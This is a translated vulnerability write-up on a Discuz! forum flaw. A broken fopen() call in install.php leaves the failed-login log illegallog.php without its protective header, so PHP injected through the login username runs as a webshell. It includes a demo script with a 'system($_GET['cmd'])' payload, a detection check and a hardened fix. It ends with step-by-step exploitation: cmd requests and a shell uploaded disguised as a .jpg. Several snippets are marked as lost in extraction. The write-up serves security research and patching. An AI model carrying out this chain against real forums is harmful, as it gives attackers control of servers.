Discuz! Forum install.php File-Write Error Vulnerability Research

Source: Internet
Author: User
A file-write error lets a malicious user get a constructed statement written into a web-accessible PHP file, turning that file into a webshell and giving control of the entire server.
A few nights ago I set the front-end files aside and went over every variable that gets read into a database call, looking for places where the filtering is not strict. There are in fact plenty of such places, but all of them are protected by quotation marks. In PHP, when magic_quotes_gpc=on (the default), the interpreter automatically escapes single quotes and other special characters, and at that point it is very hard for us to alter the program's execution flow. That greatly raises the difficulty of an intrusion and, to a degree, really does guarantee the forum's security. It is also why, when a friend finds a hole, he makes sure it still works with magic_quotes_gpc on: a vulnerability that needs a single quote to be exploited is essentially useless against the Discuz! forum.
After reading every database call in every file I had found nothing of value. At this point my thinking started to get a little messy. I wondered whether I should look for the programmer's logic flaws instead, which means reading through all of the code and finding the places the programmer did not think about while writing it. Mostly these are errors in the logical relationship between one piece of context and another, or a restriction that is incomplete: things that should have been noticed but that the developers happened to overlook.
Thinking it over, there was no way to be lazy here; I simply had to read through the code. Since the target is a logic error, the context matters, so I chose to start at the entry point. The entry point should be logging.php, because that is where everyone logs in and enters the forum. Let's go!
As usual, let's take a look at the code first:
=========codz begin==========
$errorlog = "$username\t".substr($password, 0, 2);
......
$errorlog .= substr($password, -1)."\t$onlineip\t$timestamp\n";
$password = md5($password);
$query = $db->query("SELECT m.username AS discuz_user, m.password AS discuz_pw, m.status, m.styleid AS styleidmem, m.lastvisit,
    u.groupid, u.isadmin, u.specifiedusers LIKE '%\t$username\t%' AS specifieduser
    FROM $table_members m LEFT JOIN $table_usergroups u ON u.specifiedusers LIKE '%\t$username\t%' OR u.status=m.status AND ((u.creditshigher='0' AND u.creditslower='0' AND u.specifiedusers='') OR (m.credit>=u.creditshigher AND m.credit /* upper credit bound lost in extraction */ ))
    WHERE username='$username' AND password='$password' ORDER BY specifieduser DESC");
......
if(!$discuz_user) {
    // failed login: the raw $username is appended to a .php file, every call wrapped in @
    @$fp = fopen($discuz_root.'./forumdata/illegallog.php', 'a');
    @flock($fp, 3);
    @fwrite($fp, $errorlog);
    @fclose($fp);
    showmessage('login_invalid', 'index.php');
}
=========codz endz==============
Looking at this code: it first records the username and password that were entered, taking only the first two characters of the password, then the last character of the password, and joins them with the IP address and the timestamp. Then it takes the MD5 of the password and queries the database with it. If you think we can change the execution of the database statement, you are wrong; we can do nothing with single quotes (at least I can't, unless I get around the escaping). If the username and password are wrong, the bad username and password are logged to illegallog.php. Throughout this recording of the wrong password the variables are never validated, which means that if I deliberately enter a wrong username it is not checked and is recorded directly. So if my bad username is executable code, that gets recorded too. Once it has been recorded, we can request that file to get a shell.
Excited at this point? Sorry, your excitement is premature. I was not excited at all, because on my first read I had paid special attention to how Discuz! handles file writes: it does not filter the individual variables, but at initialization time install.php adds a line to the beginning of every data file that ends in .php, one that terminates execution. That is written at installation, and we should all understand what that line does: whatever you write can never be called, because execution stops at the start of the file. Clearly this was not going to work. A little annoyed, I admitted defeat, dropped the code and went over to my grandmother's house to hang around her (getting spoiled, teasing and making trouble in front of Grandma is one of my favourite things). I cursed the perversity of Discuz! to her repeatedly and told her how carefully I had read the code. Grandma had no idea what I was talking about and did not mind my fussing; she just kept watching her TV. After a while she said: "You, child, are careless and not the least bit thorough. Go look at that code (I think she meant code) again." I laughed and crawled back home. Sitting in front of the computer, I drank a cup of hot water and calmed down a bit.
Carefulness, perseverance, self-study and a habit of summarizing are all essential. I went back and read logging.php again to see whether I had missed anything. The file is not long, and on a second look there really is nothing wrong there. Since there is no problem here, my thoughts turned to that one line: how exactly is it written?
So I went to the relevant code in install.php:
==========codz begin==========
function loginit($log) {
    echo 'Initializing log '.$log;
    $fp = @fopen('./forumdata/illegallog.php');   // fopen() called with a single argument
    @fwrite($fp, "\n");                            // the protective PHP line written here was lost in extraction; only the newline survives
    @fclose($fp);
    result();
}
......
loginit('karmalog');
loginit('illegallog');
loginit('modslog');
loginit('cplog');
dir_clear('./forumdata/templates');
dir_clear('./forumdata/cache');
==========codz endz==========
Obviously the loginit function is what writes that line into illegallog.php. With it in place, even if we get code written into the file, it cannot be executed because of that line. We seem to have hit a dead end. But something about this piece of code bothered me, and looking again, that fopen did not look right. If I remember correctly, fopen's syntax is:
resource fopen(string filename, string mode [, int use_include_path [, resource zcontext]])
Of the first two parameters, one names which file to open and the other specifies how to open it, for reading, writing and so on. Note that both of these parameters are required. For example, to write jambalaya.php in the current directory the statement is fopen('./jambalaya.php', 'w'); the open mode after the filename must be given, otherwise it is an error. But notice that his code passes only one parameter, so how could the program run correctly?
Let's do a test. Create a 1.php and write the following code into it:
===========codz begin==========
<?php
// same pattern as install.php: fopen() without a mode, errors suppressed with @
$fp = @fopen('./2.php');
@fwrite($fp, "\n");   // the protective line from the original was lost in extraction
@fclose($fp);
echo "success!";
?>
===========codz endz============
This is the same environment as Discuz!. If the program succeeds it should create a 2.php in the directory whose first line is that protective line, and the screen should show success; the success here is really just there to tell us how far the program got. We request http://127.0.0.1/myhome/1.php and the screen shows success, which means execution reached the end of the program. Checking the directory, however, no file named 2.php was created, which means the write failed. You may be surprised that a failed write produced no error message. It should have, but @ was placed before fopen, and in PHP @ suppresses every error message produced by the call it is applied to. In other words, even though there was an error, nothing was reported.
Grandma's lesson was right: I was too careless!
Assuming everything is as I reasoned, then during installation's initialization, because of the wrong fopen usage, the discuz/forumdata directory never gets an illegallog.php containing the protective line; but because the error was suppressed the installer still reports the initialization as successful, when in fact nothing was initialized and no illegallog.php was produced. If it is not initialized here, the creation of illegallog.php falls to logging.php, and the logging.php write puts no protective statement into the file and applies no filtering to stop users from invoking it. At this point everything is clear. Bluntly: because of the initialization error in install.php, we can write malicious code through logging.php and then request that file to obtain a shell and control the whole site.
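The following is an added example, not code from Discuz! or from the original article. It reproduces the chain just described in one runnable script (an install-time fopen() with a missing mode that fails silently, followed by a logging.php-style append that creates the log file with no protective first line), gives a check you can run against an existing log file, and shows a hardened writer. The file name, the exact wording of the protective line and the temp-directory location are assumptions; the attacker "username" is a constructed payload.

```php
<?php
// Added example, not Discuz! code: reproduce the silent-failure chain and
// show a hardened log writer. Paths and the protective line are assumptions.
declare(strict_types=1);

// Line install.php is meant to put at the top of every log file so that
// requesting the file over HTTP executes nothing. Exact wording assumed.
const PROTECT = "<?php exit(); ?>\n";

// install.php-style initialization: fopen() with one argument, errors hidden by @.
// PHP 5/7 return NULL with a warning; PHP 8 throws ArgumentCountError, which @ does
// not suppress. Either way no file is created and the installer never notices.
function vulnerable_loginit(string $path): bool
{
    try {
        $fp = @fopen($path);
    } catch (\ArgumentCountError $e) {
        $fp = false;
    }
    if ($fp) {                 // guard only so PHP 8 does not throw TypeError on fwrite(false)
        @fwrite($fp, PROTECT);
        @fclose($fp);
    }
    return file_exists($path); // false: initialization silently did nothing
}

// logging.php-style failed-login record: appends the raw username, creating the
// file if it does not exist. With no header in front, the username becomes the
// first bytes of a .php file that the web server will happily execute.
function vulnerable_log_failure(string $path, string $username, string $password, string $ip): void
{
    $line = $username . "\t" . substr($password, 0, 2) . substr($password, -1)
          . "\t$ip\t" . time() . "\n";
    $fp = fopen($path, 'a');
    flock($fp, LOCK_EX);
    fwrite($fp, $line);
    fclose($fp);
}

// Check to run against forumdata/*.php on a deployed forum: is the protective line there?
function log_is_protected(string $path): bool
{
    $head = file_get_contents($path, false, null, 0, strlen(PROTECT));
    return $head === PROTECT;
}

// Hardened writer: opens without @ and fails loudly, adds the header itself when it
// is the first writer (no longer dependent on install.php), neutralises '<', '>' and
// control characters in user input, and drops the password fragments that should
// never have been logged in the first place.
function hardened_log_failure(string $path, string $username, string $ip): void
{
    $fp = fopen($path, 'c+');  // create if missing, never truncate
    if ($fp === false) {
        throw new RuntimeException("cannot open $path");
    }
    flock($fp, LOCK_EX);
    fseek($fp, 0, SEEK_END);
    if (ftell($fp) === 0) {
        fwrite($fp, PROTECT);
    }
    $safe = htmlspecialchars(preg_replace('/[\x00-\x1f\x7f]/', '', $username), ENT_QUOTES);
    fwrite($fp, $safe . "\t" . $ip . "\t" . time() . "\n");
    fclose($fp);
}

// Demonstration with a constructed payload in a private temp directory.
$dir = sys_get_temp_dir() . '/dz_demo_' . getmypid();
mkdir($dir);
$log = $dir . '/illegallog.php';
$payload = "<?php system(\$_GET['cmd']); ?>";   // constructed attacker "username"

$initialised = vulnerable_loginit($log);
vulnerable_log_failure($log, $payload, 'secret', '127.0.0.1');
$poisoned = !log_is_protected($log) && strpos(file_get_contents($log), '<?php system') === 0;
var_dump($initialised, $poisoned);               // bool(false) bool(true): file starts with attacker PHP

unlink($log);
hardened_log_failure($log, $payload, '127.0.0.1');
$clean = log_is_protected($log) && strpos(file_get_contents($log), '<?php system') === false;
var_dump($clean);                                // bool(true): header present, payload encoded

unlink($log);
rmdir($dir);
```

The real fix for a deployment is not only the header: keep logs outside the web root or with a non-executable extension, and deny direct HTTP access to forumdata/ in the web server configuration, so that a single missed initialization step can no longer turn a log into a shell.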


The exploit procedure is as follows.
The following may be offensive and is for security research and teaching purposes only. Use at your own risk.

Do not register any account. Go to the login page and, in the login username field, first enter 123456 and press Enter. Here you will see why only the first two characters of the password are displayed: illegallog.php now contains:
6 127.0.0.1 1022383175

This lets you view the PHP settings; check whether register_globals is on (on most sites it is). Good. Then we enter our code at the login prompt. It is best not to use system(), because in my tests many sites had the system() function disabled.
Then we call http://192.168.0.13/forumdata/illegallog.php?cmd=dir
Above a pile of junk entries, at the very bottom, you can see the directory listing. Working this way is cumbersome, though: on a large site with over 100,000 registered users (as in my experiment) this file becomes astonishingly large and very slow to open.
So we can do it differently: rename the PHP shell to a .jpg image and upload it to the host.
Then call it through the URL:
http://192.168.0.13/forumdata/illegallog.p...chments/Jam.php
Then we request the URL directly:
http://192.168.0.13/attachments/Jam.php ... and that is a shell now!